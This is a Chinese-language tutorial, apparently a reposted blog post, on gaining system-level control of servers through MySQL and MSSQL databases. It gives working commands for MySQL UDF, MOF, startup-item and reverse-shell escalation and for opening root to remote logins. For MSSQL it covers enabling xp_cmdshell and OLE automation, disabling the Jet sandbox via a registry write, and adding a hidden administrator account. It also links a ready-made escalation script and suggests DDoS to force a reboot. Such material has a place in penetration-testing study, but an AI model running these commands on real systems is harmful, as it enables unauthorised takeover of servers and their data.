[大数据] 提权-MY&MS&ORA数据库提权

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> 大数据 -> 提权-MY&MS&ORA数据库提权 -> 正文阅读

[大数据]提权-MY&MS&ORA数据库提权

在这里插入图片描述

数据库提权：

在利用系统溢出漏洞无果的情况下，可以采用数据库进行提权来获得系统权限，不是提升数据库用户的权限，但需要知道数据库提权的前提条件：服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外，其他数据库基本都存在数
据库提权的可能。

#数据库应用提权在权限提升中的意义
#WEB 或本地环境如何探针数据库应用
#数据库提权权限用户密码收集等方法
#目前数据库提权对应的技术及方法等

提权流程：服务探针->信息收集->提权利用->获取权限

探针查看是否有数据库服务：

扫描端口，mysql：3306、sqlserver：1433、oracle：1521、DB2：5000、PostgreSQL：5432等
cmd/shell下查看本地服务/进程
其他

信息收集获取密码：

网站连接数据库的配置文件，一般此方法就够了
mysql存储文件，见下
暴力破坏，见下
其他

1）mysql文件夹下有着myd后缀文件是与数据表相匹配的，因此可以直接查看文件来找各种信息，比如mysql的user表存储着用户信息，因此user.myd文件必定存储着root用户的账号密码。（@@basedir/data/数据库名/表名.myd）

2）利用脚本暴力猜解(了解数据库是否支持外联及如何开启外联mysql默认root不允许外联，root只能本机来连接才行），脚本相对于工具更容易在目标本机上执行，同时可以本地爆破连接本机root，避免了外联的限制。
3）总之就这张图：
在这里插入图片描述

MySQL数据库提权演示-脚本&MSF：
在这里插入图片描述
mysql提权方法有以上四种。

提权利用（一）（UDF方法，基于 MYSQL 调用命令执行函数，需要创建并操作dll文件到指定目录以及利用脚本来实现）：

先来了解下mysql的udf是什么：https://blog.csdn.net/luoqiya/article/details/12888553，简而言之就是我们可以利用udf函数的特性与操作系统进行交互进而命令执行，并且神器sqlmap里边也集成有此功能，在sqlmap根目录\data\udf\myqsl下，具体使用百度。

利用此方法第一步先判断版本和安装路径：
1.mysql<5.1则导出dll文件到目录 c:/windows 或 system32
2.mysql=>5.1 则导出dll文件到安装目录 /lib/plugin(这个目录默认是没有的,需要我们去创建)

select version();

select @@basedir;//查看安装目录

在这里插入图片描述

之后有安装路径最好，没有则需要创建路径。
手工创建 plugin 目录或利用 NTFS 流创建。

select 'x' into dumpfile '目录/lib/plugin::INDEX_ALLOCATION';

最后创建并移动dll文件，成功后，mysql命令行下就可以命令执行了。

我感觉创建dll文件的本质应该是创建一个mysql的表，并将保存的文件后缀为dll，具体我也不太清楚，自己搞不来这文件，直接用别人写的脚本来执行操作的，只用输入数据库root账号密码就行了，可以分析下脚本源码来学习无脚本时自己怎么操作，php环境就用php脚本。

利用脚本（别人写好的或者自己写的上传至目标主机运行，优秀的脚本甚至帮你判断了mysql版本和安装路径）直接创建并导出 dll 文件至根据mysql版本号判断出的路径，最后就可以自定义执行函数从而操作系统命令执行。
在这里插入图片描述

在这里插入图片描述

/*
暗月的mysqludf提权脚本及使用：
链接：https://pan.baidu.com/s/1wztja_QAH2hspybVnE6BCA
提取码：2i7s
*/

可能的问题：
1）对权限要求挺高：1、secure_file_priv 配置；2、目录的写权限
2）脚本文件是否匹配mysql版本和位数
3）目录是否存在
4）是否是mysql版本应该对应的路径，而且windows与linux上的路径自然也不一样。

自己测试时脚本运行环境最好是直接搭建的mysql服务，集成的phpstudy环境容易出很多破问题，我本机用的集成环境搭建时就总是爆错，因此出问题了要不就找出bug解决要不就换个环境比如虚拟机。

提权利用（二）（MOF方法：基于 MYSQL 特性的安全问题）

成功几率不大，原理及利用参考文章：https://www.cnblogs.com/xishaonian/p/6384535.html

提权利用（三） 利用启动项(基于配合操作系统自启动)

手动导出自定义可执行文件到启动目录配合重启执行或msf工具将创建好的后?或执行文件进行服务器启动项写入,（前提是mysql打开外连让msf连上才行）配合重启执行;

让对方重启：ddos。

mysql开启外连：

GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root"

在这里插入图片描述
提权利用（四） 反弹提权（反弹shell命令执行）

在这里插入图片描述
本地开启监听端口和服务，还是利用那个脚本，创建反弹shell函数，sql语句执行函数，将shell反弹给自己的本地主机，可以执行系统命令。

MSSQL（sql serve）数据库提权演示：

1）使用xp_cmdshell进行提权：

xp_cmdshell(数据库-系统数据库-mater-可编程性-系统扩展存储过程)默认在mssql2000中是开启的,在mssql2005之后的版本中则是默认禁止的,如果用户拥有管理员sa权限则可以用sp_congifgure重新开启它:

启用:
EXEC sp_configure ‘show advanced options’,1 ;
Reconfigure;
EXEC sp_configure ‘xp_cmdshell’,1;
关闭:
EXEC sp_configure ‘show advanced options’,1;
reconfigure;
exec sp_config ‘xp_cmdshell’,0;
reconfigure;
执行：
exec master.dbo.xp_cmdshell ‘系统命令’ ，而且是system权限！

在这里插入图片描述

如果xp_cmdshell被删除了,可以上传xplog70.dll恢复：

exec master.sys.sp_addextendeproc 'xp_cmdshell','c:\Program Files\Microsoft SQL server\MSSQL\Binn\xplog70.dll'

2）使用sp_oacreate提权：

主要用来调用OLE对象,利用OLE对象的run方法执行系统命令。

启用：
EXEC sp_configure ‘show advanced options’, 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure ‘Ole Automation Procedures’, 1;
RECONFIGURE WITH OVERRIDE;
关闭：
EXEC sp_configure ‘show advanced options’, 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure ‘Ole Automation Procedures’, 0;
RECONFIGURE WITH OVERRIDE;
执行： 将无回显地执行结果写入进文件
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod
@shell,‘run’,null,‘c:\windows\system32\cmd.exe /c whoami >c:\1.txt’

3）使用SQL server沙盒提权：

沙盒是一种安全机制，为运行中的程序提供的隔离环境。通常是作为一些来源不可信、具破坏力或无法判定程序意图的程序提供实验之用。

--提权语句

exec sp_configure 'show advanced options',1;reconfigure;

-- 不开启的话在执行xp_regwrite会提示让我们开启，

exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;

--关闭沙盒模式，如果一次执行全部代码有问题，先执行上面两句代码。

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;

--查询是否正常关闭，经过测试发现沙盒模式无论是开，还是关，都不会影响我们执行下面的语句。

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'

--执行系统命令select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user margin margin /add")')

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators margin /add")')